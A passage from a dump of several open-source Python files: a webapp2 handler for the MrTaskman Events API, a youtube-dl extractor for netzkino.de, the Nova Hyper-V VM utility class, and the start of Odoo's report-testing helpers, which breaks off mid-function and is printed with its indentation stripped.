# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handlers for the MrTaskman Events API."""
__author__ = 'jeff.carollo@gmail.com (Jeff Carollo)'
import json
import logging
import urllib
import webapp2
from models import events
from util import model_to_dict
class EventsError(Exception):
def __init__(self, message):
Exception.__init__(self, message)
class EventsHandler(webapp2.RequestHandler):
"""Handles requests for Events."""
def get(self, arg='all'):
"""Dispatches GET request to the right method according to form."""
logging.info('got arg: %s', arg)
if arg.isdigit():
return self.GetEventById(arg)
if arg == 'all':
return self.GetAllEvents()
self.response.out.write('Invalid argument: %s' % arg)
self.response.set_status(400)
return
def GetAllEvents(self):
"""Convenience HTML form for testing."""
accept_type = self.GetAcceptTypeHtmlOrJson()
self.response.headers['Content-Type'] = accept_type
event_list = events.GetEventList()
if 'html' in accept_type:
# TODO(jeff.carollo): Extract out to Django templates.
self.response.out.write(
"""
<html><head><title>Events</title></head><body>
<pre><code>%s</code><pre>
</body></html>
""" % '<br/>'.join([
json.dumps(model_to_dict.ModelToDict(event), indent=2)
for event in event_list]))
self.response.out.write('\n')
return
if 'json' in accept_type:
response = dict()
response['kind'] = 'mrtaskman#event_list'
response['event_list'] = [
model_to_dict.ModelToDict(event) for event in event_list]
json.dump(response, self.response.out, indent=2)
self.response.out.write('\n')
return
# Should never get here.
logging.error('Sending 500 because we could not determine a Content-Type.')
self.response.out.write('Accept type not text/html or application/json.')
self.response.set_status(500)
return
def post(self):
"""Creates an Event from a worker."""
logging.info('Request: %s', self.request.body)
event = urllib.unquote(self.request.body.decode('utf-8'))
try:
event = json.loads(event, 'utf-8')
except ValueError, e:
logging.info(e)
event = None
if not event or not event.get('kind', '') == 'mrtaskman#event':
self.response.out.write('POST body must contain an Event entity.')
self.response.set_status(400)
return
try:
event = events.CreateEvent(event)
except events.ClientEventError, e:
self.response.out.write('Error creating event: %s' % e.message)
self.response.set_status(400)
return
except events.ServerEventError, e:
self.response.out.write('Error creating event: %s' % e.message)
self.response.set_status(500)
return
self.response.headers['Content-Type'] = 'application/json'
response = model_to_dict.ModelToDict(event)
response['kind'] = 'mrtaskman#event'
json.dump(response, self.response.out, indent=2)
self.response.out.write('\n')
def GetAcceptTypeHtmlOrJson(self):
"""Parses Accept header and determines whether to send HTML or JSON.
Defaults to 'application/json' unless HTML comes first in Accept line.
Returns:
Accept type as str.
"""
accept = self.request.headers.get('Accept', '')
accepts = accept.split(';')
accept = 'application/json'
for candidate_accept in accepts:
if 'json' in candidate_accept:
break
if 'html' in candidate_accept:
accept = 'text/html'
break
return accept
def GetEventById(self, event_id):
"""Retrieves an Event."""
try:
event_id = int(event_id)
except:
self.response.out.write('event_id must be numeric')
self.response.set_status(400)
return
try:
event = events.GetEventById(event_id)
except events.ClientEventError, e:
logging.exception(e)
self.response.out.write('Error retrieving Event info: %s' % e.message)
self.response.set_status(400)
return
except events.ServerEventError, e:
logging.exception(e)
self.response.out.write('Error retrieving Event info: %s' % e.message)
self.response.set_status(500)
return
if not event:
logging.info('No event found with id %d', event_id)
self.response.set_status(404)
return
response = model_to_dict.ModelToDict(event)
response['kind'] = 'mrtaskman#event'
self.response.headers['Content-Type'] = 'application/json'
json.dump(response, self.response.out, indent=2)
self.response.out.write('\n')
def delete(self, event_id):
"""Deletes a package and its associated blobs."""
try:
event_id = int(event_id)
except:
self.response.out.write('event_id must be numeric')
self.response.set_status(400)
return
deleted = events.DeleteEventById(event_id)
if not deleted:
self.response.set_status(404)
return
app = webapp2.WSGIApplication([
('/events/([a-z0-9]+)', EventsHandler),
('/events', EventsHandler),
], debug=True)
|
jlegendary/youtube-dl | refs/heads/master | youtube_dl/extractor/netzkino.py | 142 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
clean_html,
int_or_none,
js_to_json,
parse_iso8601,
)
class NetzkinoIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?netzkino\.de/\#!/(?P<category>[^/]+)/(?P<id>[^/]+)'
_TEST = {
'url': 'http://www.netzkino.de/#!/scifikino/rakete-zum-mond',
'md5': '92a3f8b76f8d7220acce5377ea5d4873',
'info_dict': {
'id': 'rakete-zum-mond',
'ext': 'mp4',
'title': 'Rakete zum Mond (Endstation Mond, Destination Moon)',
'comments': 'mincount:3',
'description': 'md5:1eddeacc7e62d5a25a2d1a7290c64a28',
'upload_date': '20120813',
'thumbnail': 're:https?://.*\.jpg$',
'timestamp': 1344858571,
'age_limit': 12,
},
'params': {
'skip_download': 'Download only works from Germany',
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
category_id = mobj.group('category')
video_id = mobj.group('id')
api_url = 'http://api.netzkino.de.simplecache.net/capi-2.0a/categories/%s.json?d=www' % category_id
api_info = self._download_json(api_url, video_id)
info = next(
p for p in api_info['posts'] if p['slug'] == video_id)
custom_fields = info['custom_fields']
production_js = self._download_webpage(
'http://www.netzkino.de/beta/dist/production.min.js', video_id,
note='Downloading player code')
avo_js = self._search_regex(
r'var urlTemplate=(\{.*?"\})',
production_js, 'URL templates')
templates = self._parse_json(
avo_js, video_id, transform_source=js_to_json)
suffix = {
'hds': '.mp4/manifest.f4m',
'hls': '.mp4/master.m3u8',
'pmd': '.mp4',
}
film_fn = custom_fields['Streaming'][0]
formats = [{
'format_id': key,
'ext': 'mp4',
'url': tpl.replace('{}', film_fn) + suffix[key],
} for key, tpl in templates.items()]
self._sort_formats(formats)
comments = [{
'timestamp': parse_iso8601(c.get('date'), delimiter=' '),
'id': c['id'],
'author': c['name'],
'html': c['content'],
'parent': 'root' if c.get('parent', 0) == 0 else c['parent'],
} for c in info.get('comments', [])]
return {
'id': video_id,
'formats': formats,
'comments': comments,
'title': info['title'],
'age_limit': int_or_none(custom_fields.get('FSK')[0]),
'timestamp': parse_iso8601(info.get('date'), delimiter=' '),
'description': clean_html(info.get('content')),
'thumbnail': info.get('thumbnail'),
'playlist_title': api_info.get('title'),
'playlist_id': category_id,
}
|
CiscoSystems/nova | refs/heads/master | nova/virt/hyperv/vmutils.py | 8 | # Copyright (c) 2010 Cloud.com, Inc
# Copyright 2012 Cloudbase Solutions Srl / Pedro Navarro Perez
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility class for VM related operations on Hyper-V.
"""
import sys
import time
import uuid
if sys.platform == 'win32':
import wmi
from oslo.config import cfg
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.virt.hyperv import constants
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
# TODO(alexpilotti): Move the exceptions to a separate module
# TODO(alexpilotti): Add more domain exceptions
class HyperVException(exception.NovaException):
def __init__(self, message=None):
super(HyperVException, self).__init__(message)
# TODO(alexpilotti): Add a storage exception base class
class VHDResizeException(HyperVException):
def __init__(self, message=None):
super(HyperVException, self).__init__(message)
class HyperVAuthorizationException(HyperVException):
def __init__(self, message=None):
super(HyperVException, self).__init__(message)
class UnsupportedConfigDriveFormatException(HyperVException):
def __init__(self, message=None):
super(HyperVException, self).__init__(message)
class VMUtils(object):
# These constants can be overridden by inherited classes
_PHYS_DISK_RES_SUB_TYPE = 'Microsoft Physical Disk Drive'
_DISK_RES_SUB_TYPE = 'Microsoft Synthetic Disk Drive'
_DVD_RES_SUB_TYPE = 'Microsoft Synthetic DVD Drive'
_IDE_DISK_RES_SUB_TYPE = 'Microsoft Virtual Hard Disk'
_IDE_DVD_RES_SUB_TYPE = 'Microsoft Virtual CD/DVD Disk'
_IDE_CTRL_RES_SUB_TYPE = 'Microsoft Emulated IDE Controller'
_SCSI_CTRL_RES_SUB_TYPE = 'Microsoft Synthetic SCSI Controller'
_SETTINGS_DEFINE_STATE_CLASS = 'Msvm_SettingsDefineState'
_VIRTUAL_SYSTEM_SETTING_DATA_CLASS = 'Msvm_VirtualSystemSettingData'
_RESOURCE_ALLOC_SETTING_DATA_CLASS = 'Msvm_ResourceAllocationSettingData'
_PROCESSOR_SETTING_DATA_CLASS = 'Msvm_ProcessorSettingData'
_MEMORY_SETTING_DATA_CLASS = 'Msvm_MemorySettingData'
_STORAGE_ALLOC_SETTING_DATA_CLASS = _RESOURCE_ALLOC_SETTING_DATA_CLASS
_SYNTHETIC_ETHERNET_PORT_SETTING_DATA_CLASS = \
'Msvm_SyntheticEthernetPortSettingData'
_AFFECTED_JOB_ELEMENT_CLASS = "Msvm_AffectedJobElement"
_vm_power_states_map = {constants.HYPERV_VM_STATE_ENABLED: 2,
constants.HYPERV_VM_STATE_DISABLED: 3,
constants.HYPERV_VM_STATE_REBOOT: 10,
constants.HYPERV_VM_STATE_PAUSED: 32768,
constants.HYPERV_VM_STATE_SUSPENDED: 32769}
def __init__(self, host='.'):
self._enabled_states_map = dict((v, k) for k, v in
self._vm_power_states_map.iteritems())
if sys.platform == 'win32':
self._init_hyperv_wmi_conn(host)
self._conn_cimv2 = wmi.WMI(moniker='//%s/root/cimv2' % host)
def _init_hyperv_wmi_conn(self, host):
self._conn = wmi.WMI(moniker='//%s/root/virtualization' % host)
def list_instances(self):
"""Return the names of all the instances known to Hyper-V."""
vm_names = [v.ElementName for v in
self._conn.Msvm_ComputerSystem(['ElementName'],
Caption="Virtual Machine")]
return vm_names
def get_vm_summary_info(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
vmsettings = vm.associators(
wmi_association_class=self._SETTINGS_DEFINE_STATE_CLASS,
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
settings_paths = [v.path_() for v in vmsettings]
#See http://msdn.microsoft.com/en-us/library/cc160706%28VS.85%29.aspx
(ret_val, summary_info) = vs_man_svc.GetSummaryInformation(
[constants.VM_SUMMARY_NUM_PROCS,
constants.VM_SUMMARY_ENABLED_STATE,
constants.VM_SUMMARY_MEMORY_USAGE,
constants.VM_SUMMARY_UPTIME],
settings_paths)
if ret_val:
raise HyperVException(_('Cannot get VM summary data for: %s')
% vm_name)
si = summary_info[0]
memory_usage = None
if si.MemoryUsage is not None:
memory_usage = long(si.MemoryUsage)
up_time = None
if si.UpTime is not None:
up_time = long(si.UpTime)
enabled_state = self._enabled_states_map[si.EnabledState]
summary_info_dict = {'NumberOfProcessors': si.NumberOfProcessors,
'EnabledState': enabled_state,
'MemoryUsage': memory_usage,
'UpTime': up_time}
return summary_info_dict
def _lookup_vm_check(self, vm_name):
vm = self._lookup_vm(vm_name)
if not vm:
raise exception.NotFound(_('VM not found: %s') % vm_name)
return vm
def _lookup_vm(self, vm_name):
vms = self._conn.Msvm_ComputerSystem(ElementName=vm_name)
n = len(vms)
if n == 0:
return None
elif n > 1:
raise HyperVException(_('Duplicate VM name found: %s') % vm_name)
else:
return vms[0]
def vm_exists(self, vm_name):
return self._lookup_vm(vm_name) is not None
def get_vm_id(self, vm_name):
vm = self._lookup_vm_check(vm_name)
return vm.Name
def _get_vm_setting_data(self, vm):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
# Avoid snapshots
return [s for s in vmsettings if s.SettingType == 3][0]
def _set_vm_memory(self, vm, vmsetting, memory_mb, dynamic_memory_ratio):
mem_settings = vmsetting.associators(
wmi_result_class=self._MEMORY_SETTING_DATA_CLASS)[0]
max_mem = long(memory_mb)
mem_settings.Limit = max_mem
if dynamic_memory_ratio > 1:
mem_settings.DynamicMemoryEnabled = True
# Must be a multiple of 2
reserved_mem = min(
long(max_mem / dynamic_memory_ratio) >> 1 << 1,
max_mem)
else:
mem_settings.DynamicMemoryEnabled = False
reserved_mem = max_mem
mem_settings.Reservation = reserved_mem
# Start with the minimum memory
mem_settings.VirtualQuantity = reserved_mem
self._modify_virt_resource(mem_settings, vm.path_())
def _set_vm_vcpus(self, vm, vmsetting, vcpus_num, limit_cpu_features):
procsetting = vmsetting.associators(
wmi_result_class=self._PROCESSOR_SETTING_DATA_CLASS)[0]
vcpus = long(vcpus_num)
procsetting.VirtualQuantity = vcpus
procsetting.Reservation = vcpus
procsetting.Limit = 100000 # static assignment to 100%
procsetting.LimitProcessorFeatures = limit_cpu_features
self._modify_virt_resource(procsetting, vm.path_())
def update_vm(self, vm_name, memory_mb, vcpus_num, limit_cpu_features,
dynamic_memory_ratio):
vm = self._lookup_vm_check(vm_name)
vmsetting = self._get_vm_setting_data(vm)
self._set_vm_memory(vm, vmsetting, memory_mb, dynamic_memory_ratio)
self._set_vm_vcpus(vm, vmsetting, vcpus_num, limit_cpu_features)
def check_admin_permissions(self):
if not self._conn.Msvm_VirtualSystemManagementService():
msg = _("The Windows account running nova-compute on this Hyper-V"
" host doesn't have the required permissions to create or"
" operate the virtual machine.")
raise HyperVAuthorizationException(msg)
def create_vm(self, vm_name, memory_mb, vcpus_num, limit_cpu_features,
dynamic_memory_ratio):
"""Creates a VM."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
LOG.debug(_('Creating VM %s'), vm_name)
vm = self._create_vm_obj(vs_man_svc, vm_name)
vmsetting = self._get_vm_setting_data(vm)
LOG.debug(_('Setting memory for vm %s'), vm_name)
self._set_vm_memory(vm, vmsetting, memory_mb, dynamic_memory_ratio)
LOG.debug(_('Set vCPUs for vm %s'), vm_name)
self._set_vm_vcpus(vm, vmsetting, vcpus_num, limit_cpu_features)
def _create_vm_obj(self, vs_man_svc, vm_name):
vs_gs_data = self._conn.Msvm_VirtualSystemGlobalSettingData.new()
vs_gs_data.ElementName = vm_name
(job_path,
ret_val) = vs_man_svc.DefineVirtualSystem([], None,
vs_gs_data.GetText_(1))[1:]
self.check_ret_val(ret_val, job_path)
return self._lookup_vm_check(vm_name)
def get_vm_scsi_controller(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._RESOURCE_ALLOC_SETTING_DATA_CLASS)
res = [r for r in rasds
if r.ResourceSubType == self._SCSI_CTRL_RES_SUB_TYPE][0]
return res.path_()
def _get_vm_ide_controller(self, vm, ctrller_addr):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._RESOURCE_ALLOC_SETTING_DATA_CLASS)
return [r for r in rasds
if r.ResourceSubType == self._IDE_CTRL_RES_SUB_TYPE
and r.Address == str(ctrller_addr)][0].path_()
def get_vm_ide_controller(self, vm_name, ctrller_addr):
vm = self._lookup_vm_check(vm_name)
return self._get_vm_ide_controller(vm, ctrller_addr)
def get_attached_disks_count(self, scsi_controller_path):
volumes = self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = "
"'%(res_sub_type)s' AND "
"Parent = '%(parent)s'" %
{"class_name":
self._RESOURCE_ALLOC_SETTING_DATA_CLASS,
'res_sub_type':
self._PHYS_DISK_RES_SUB_TYPE,
'parent':
scsi_controller_path.replace("'", "''")})
return len(volumes)
def _get_new_setting_data(self, class_name):
return self._conn.query("SELECT * FROM %s WHERE InstanceID "
"LIKE '%%\\Default'" % class_name)[0]
def _get_new_resource_setting_data(self, resource_sub_type,
class_name=None):
if class_name is None:
class_name = self._RESOURCE_ALLOC_SETTING_DATA_CLASS
return self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = "
"'%(res_sub_type)s' AND "
"InstanceID LIKE '%%\\Default'" %
{"class_name": class_name,
"res_sub_type": resource_sub_type})[0]
def attach_ide_drive(self, vm_name, path, ctrller_addr, drive_addr,
drive_type=constants.IDE_DISK):
"""Create an IDE drive and attach it to the vm."""
vm = self._lookup_vm_check(vm_name)
ctrller_path = self._get_vm_ide_controller(vm, ctrller_addr)
if drive_type == constants.IDE_DISK:
res_sub_type = self._DISK_RES_SUB_TYPE
elif drive_type == constants.IDE_DVD:
res_sub_type = self._DVD_RES_SUB_TYPE
drive = self._get_new_resource_setting_data(res_sub_type)
#Set the IDE ctrller as parent.
drive.Parent = ctrller_path
drive.Address = drive_addr
#Add the cloned disk drive object to the vm.
new_resources = self._add_virt_resource(drive, vm.path_())
drive_path = new_resources[0]
if drive_type == constants.IDE_DISK:
res_sub_type = self._IDE_DISK_RES_SUB_TYPE
elif drive_type == constants.IDE_DVD:
res_sub_type = self._IDE_DVD_RES_SUB_TYPE
res = self._get_new_resource_setting_data(res_sub_type)
#Set the new drive as the parent.
res.Parent = drive_path
res.Connection = [path]
#Add the new vhd object as a virtual hard disk to the vm.
self._add_virt_resource(res, vm.path_())
def create_scsi_controller(self, vm_name):
"""Create an iscsi controller ready to mount volumes."""
vm = self._lookup_vm_check(vm_name)
scsicontrl = self._get_new_resource_setting_data(
self._SCSI_CTRL_RES_SUB_TYPE)
scsicontrl.VirtualSystemIdentifiers = ['{' + str(uuid.uuid4()) + '}']
self._add_virt_resource(scsicontrl, vm.path_())
def attach_volume_to_controller(self, vm_name, controller_path, address,
mounted_disk_path):
"""Attach a volume to a controller."""
vm = self._lookup_vm_check(vm_name)
diskdrive = self._get_new_resource_setting_data(
self._PHYS_DISK_RES_SUB_TYPE)
diskdrive.Address = address
diskdrive.Parent = controller_path
diskdrive.HostResource = [mounted_disk_path]
self._add_virt_resource(diskdrive, vm.path_())
def set_nic_connection(self, vm_name, nic_name, vswitch_conn_data):
nic_data = self._get_nic_data_by_name(nic_name)
nic_data.Connection = [vswitch_conn_data]
vm = self._lookup_vm_check(vm_name)
self._modify_virt_resource(nic_data, vm.path_())
def _get_nic_data_by_name(self, name):
return self._conn.Msvm_SyntheticEthernetPortSettingData(
ElementName=name)[0]
def create_nic(self, vm_name, nic_name, mac_address):
"""Create a (synthetic) nic and attach it to the vm."""
#Create a new nic
new_nic_data = self._get_new_setting_data(
self._SYNTHETIC_ETHERNET_PORT_SETTING_DATA_CLASS)
#Configure the nic
new_nic_data.ElementName = nic_name
new_nic_data.Address = mac_address.replace(':', '')
new_nic_data.StaticMacAddress = 'True'
new_nic_data.VirtualSystemIdentifiers = ['{' + str(uuid.uuid4()) + '}']
#Add the new nic to the vm
vm = self._lookup_vm_check(vm_name)
self._add_virt_resource(new_nic_data, vm.path_())
def set_vm_state(self, vm_name, req_state):
"""Set the desired state of the VM."""
vm = self._lookup_vm_check(vm_name)
(job_path,
ret_val) = vm.RequestStateChange(self._vm_power_states_map[req_state])
#Invalid state for current operation (32775) typically means that
#the VM is already in the state requested
self.check_ret_val(ret_val, job_path, [0, 32775])
LOG.debug(_("Successfully changed vm state of %(vm_name)s "
"to %(req_state)s"),
{'vm_name': vm_name, 'req_state': req_state})
def _get_disk_resource_disk_path(self, disk_resource):
return disk_resource.Connection
def get_vm_storage_paths(self, vm_name):
vm = self._lookup_vm_check(vm_name)
(disk_resources, volume_resources) = self._get_vm_disks(vm)
volume_drives = []
for volume_resource in volume_resources:
drive_path = volume_resource.HostResource[0]
volume_drives.append(drive_path)
disk_files = []
for disk_resource in disk_resources:
disk_files.extend(
[c for c in self._get_disk_resource_disk_path(disk_resource)])
return (disk_files, volume_drives)
def _get_vm_disks(self, vm):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._STORAGE_ALLOC_SETTING_DATA_CLASS)
disk_resources = [r for r in rasds if
r.ResourceSubType in
[self._IDE_DISK_RES_SUB_TYPE,
self._IDE_DVD_RES_SUB_TYPE]]
volume_resources = [r for r in rasds if
r.ResourceSubType == self._PHYS_DISK_RES_SUB_TYPE]
return (disk_resources, volume_resources)
def destroy_vm(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
#Remove the VM. Does not destroy disks.
(job_path, ret_val) = vs_man_svc.DestroyVirtualSystem(vm.path_())
self.check_ret_val(ret_val, job_path)
def check_ret_val(self, ret_val, job_path, success_values=[0]):
if ret_val == constants.WMI_JOB_STATUS_STARTED:
return self._wait_for_job(job_path)
elif ret_val not in success_values:
raise HyperVException(_('Operation failed with return value: %s')
% ret_val)
def _wait_for_job(self, job_path):
"""Poll WMI job state and wait for completion."""
job = self._get_wmi_obj(job_path)
while job.JobState == constants.WMI_JOB_STATE_RUNNING:
time.sleep(0.1)
job = self._get_wmi_obj(job_path)
if job.JobState != constants.WMI_JOB_STATE_COMPLETED:
job_state = job.JobState
if job.path().Class == "Msvm_ConcreteJob":
err_sum_desc = job.ErrorSummaryDescription
err_desc = job.ErrorDescription
err_code = job.ErrorCode
raise HyperVException(_("WMI job failed with status "
"%(job_state)d. Error details: "
"%(err_sum_desc)s - %(err_desc)s - "
"Error code: %(err_code)d") %
{'job_state': job_state,
'err_sum_desc': err_sum_desc,
'err_desc': err_desc,
'err_code': err_code})
else:
(error, ret_val) = job.GetError()
if not ret_val and error:
raise HyperVException(_("WMI job failed with status "
"%(job_state)d. Error details: "
"%(error)s") %
{'job_state': job_state,
'error': error})
else:
raise HyperVException(_("WMI job failed with status "
"%d. No error "
"description available") %
job_state)
desc = job.Description
elap = job.ElapsedTime
LOG.debug(_("WMI job succeeded: %(desc)s, Elapsed=%(elap)s"),
{'desc': desc, 'elap': elap})
return job
def _get_wmi_obj(self, path):
return wmi.WMI(moniker=path.replace('\\', '/'))
def _add_virt_resource(self, res_setting_data, vm_path):
"""Adds a new resource to the VM."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
res_xml = [res_setting_data.GetText_(1)]
(job_path,
new_resources,
ret_val) = vs_man_svc.AddVirtualSystemResources(res_xml, vm_path)
self.check_ret_val(ret_val, job_path)
return new_resources
def _modify_virt_resource(self, res_setting_data, vm_path):
"""Updates a VM resource."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val) = vs_man_svc.ModifyVirtualSystemResources(
ResourceSettingData=[res_setting_data.GetText_(1)],
ComputerSystem=vm_path)
self.check_ret_val(ret_val, job_path)
def _remove_virt_resource(self, res_setting_data, vm_path):
"""Removes a VM resource."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
res_path = [res_setting_data.path_()]
(job_path, ret_val) = vs_man_svc.RemoveVirtualSystemResources(res_path,
vm_path)
self.check_ret_val(ret_val, job_path)
def take_vm_snapshot(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val,
snp_setting_data) = vs_man_svc.CreateVirtualSystemSnapshot(vm.path_())
self.check_ret_val(ret_val, job_path)
job_wmi_path = job_path.replace('\\', '/')
job = wmi.WMI(moniker=job_wmi_path)
snp_setting_data = job.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)[0]
return snp_setting_data.path_()
def remove_vm_snapshot(self, snapshot_path):
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val) = vs_man_svc.RemoveVirtualSystemSnapshot(
snapshot_path)
self.check_ret_val(ret_val, job_path)
def detach_vm_disk(self, vm_name, disk_path):
vm = self._lookup_vm_check(vm_name)
physical_disk = self._get_mounted_disk_resource_from_path(disk_path)
if physical_disk:
self._remove_virt_resource(physical_disk, vm.path_())
def _get_mounted_disk_resource_from_path(self, disk_path):
physical_disks = self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = '%(res_sub_type)s'" %
{"class_name":
self._RESOURCE_ALLOC_SETTING_DATA_CLASS,
'res_sub_type':
self._PHYS_DISK_RES_SUB_TYPE})
for physical_disk in physical_disks:
if physical_disk.HostResource:
if physical_disk.HostResource[0].lower() == disk_path.lower():
return physical_disk
def get_mounted_disk_by_drive_number(self, device_number):
mounted_disks = self._conn.query("SELECT * FROM Msvm_DiskDrive "
"WHERE DriveNumber=" +
str(device_number))
if len(mounted_disks):
return mounted_disks[0].path_()
def get_controller_volume_paths(self, controller_path):
disks = self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = '%(res_sub_type)s' "
"AND Parent='%(parent)s'" %
{"class_name":
self._RESOURCE_ALLOC_SETTING_DATA_CLASS,
"res_sub_type":
self._PHYS_DISK_RES_SUB_TYPE,
"parent":
controller_path})
disk_data = {}
for disk in disks:
if disk.HostResource:
disk_data[disk.path().RelPath] = disk.HostResource[0]
return disk_data
def enable_vm_metrics_collection(self, vm_name):
raise NotImplementedError(_("Metrics collection is not supported on "
"this version of Hyper-V"))
|
Nowheresly/odoo | refs/heads/8.0 | openerp/tools/test_reports.py | 337 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Helper functions for reports testing.
Please /do not/ import this file by default, but only explicitly call it
through the code of yaml tests.
"""
import openerp
import openerp.report
import openerp.tools as tools
import logging
from openerp.tools.safe_eval import safe_eval
from subprocess import Popen, PIPE
import os
import tempfile
_logger = logging.getLogger(__name__)
_test_logger = logging.getLogger('openerp.tests')
def try_report(cr, uid, rname, ids, data=None, context=None, our_module=None, report_type=None):
""" Try to render a report <rname> with contents of ids
This function should also check for common pitfalls of reports.
"""
if data is None:
data = {}
if context is None:
context = {}
if rname.startswith('report.'):
rname_s = rname[7:]
else:
rname_s = rname
_test_logger.info(" - Trying %s.create(%r)", rname, ids)
res = openerp.report.render_report(cr, uid, ids, rname_s, data, context)
if not isinstance(res, tuple):
raise RuntimeError("Result of %s.create() should be a (data,format) tuple, now it is a %s" % \
(rname, type(res)))
(res_data, res_format) = res
if not res_data:
raise ValueError("Report %s produced an empty result!" % rname)
if tools.config['test_report_directory']:
file(os.path.join(tools.config['test_report_directory'], rname+ '.'+res_format), 'wb+').write(res_data)
_logger.debug("Have a %s report for %s, will examine it", res_format, rname)
if res_format == 'pdf':
if res_data[:5] != '%PDF-':
raise ValueError("Report %s produced a non-pdf header, %r" % (rname, res_data[:10]))
res_text = False
try:
fd, rfname = tempfile.mkstemp(suffix=res_format)
os.write(fd, res_data)
os.close(fd)
proc = Popen(['pdftotext', '-enc', 'UTF-8', '-nopgbrk', rfname, '-'], shell=False, stdout=PIPE)
stdout, stderr = proc.communicate()
res_text = tools.ustr(stdout)
os.unlink(rfname)
except Exception:
_logger.debug("Unable to parse PDF report: install pdftotext to perform automated tests.")
if res_text is not False:
for line in res_text.split('\n'):
if ('[[' in line) or ('[ [' in line):
_logger.error("Report %s may have bad expression near: \"%s\".", rname, line[80:])
# TODO more checks, what else can be a sign of a faulty report?
elif res_format == 'html':
pass
else:
_logger.warning("Report %s produced a \"%s\" chunk, cannot examine it", rname, res_format)
return False
_test_logger.info(" + Report %s produced correctly.", rname)
return True
def try_report_action(cr, uid, action_id, active_model=None, active_ids=None,
wiz_data=None, wiz_buttons=None,
context=None, our_module=None):
"""Take an ir.action.act_window and follow it until a report is produced
:param action_id: the integer id of an action, or a reference to xml id
of the act_window (can search [our_module.]+xml_id
:param active_model, active_ids: call the action as if it had been launched
from that model+ids (tree/form view action)
:param wiz_data: a dictionary of values to use in the wizard, if needed.
They will override (or complete) the default values of the
wizard form.
:param wiz_buttons: a list of button names, or button icon strings, which
should be preferred to press during the wizard.
Eg. 'OK' or 'gtk-print'
:param our_module: the name of the calling module (string), like 'account'
"""
if not our_module and isinstance(action_id, basestring):
if '.' in action_id:
our_module = action_id.split('.', 1)[0]
if context is None:
context = {}
else:
context = context.copy() # keep it local
# TODO context fill-up
registry = openerp.registry(cr.dbname)
def log_test(msg, *args):
_test_logger.info(" - " + msg, *args)
datas = {}
if active_model:
datas['model'] = active_model
if active_ids:
datas['ids'] = active_ids
if not wiz_buttons:
wiz_buttons = []
if isinstance(action_id, basestring):
if '.' in action_id:
act_module, act_xmlid = action_id.split('.', 1)
else:
if not our_module:
raise ValueError('You cannot only specify action_id "%s" without a module name' % action_id)
act_module = our_module
act_xmlid = action_id
act_model, act_id = registry['ir.model.data'].get_object_reference(cr, uid, act_module, act_xmlid)
else:
assert isinstance(action_id, (long, int))
act_model = 'ir.action.act_window' # assume that
act_id = action_id
act_xmlid = '<%s>' % act_id
def _exec_action(action, datas, context):
# taken from client/modules/action/main.py:84 _exec_action()
if isinstance(action, bool) or 'type' not in action:
return
# Updating the context : Adding the context of action in order to use it on Views called from buttons
if datas.get('id',False):
context.update( {'active_id': datas.get('id',False), 'active_ids': datas.get('ids',[]), 'active_model': datas.get('model',False)})
context1 = action.get('context', {})
if isinstance(context1, basestring):
context1 = safe_eval(context1, context.copy())
context.update(context1)
if action['type'] in ['ir.actions.act_window', 'ir.actions.submenu']:
for key in ('res_id', 'res_model', 'view_type', 'view_mode',
'limit', 'auto_refresh', 'search_view', 'auto_search', 'search_view_id'):
datas[key] = action.get(key, datas.get(key, None))
view_id = False
if action.get('views', []):
if isinstance(action['views'],list):
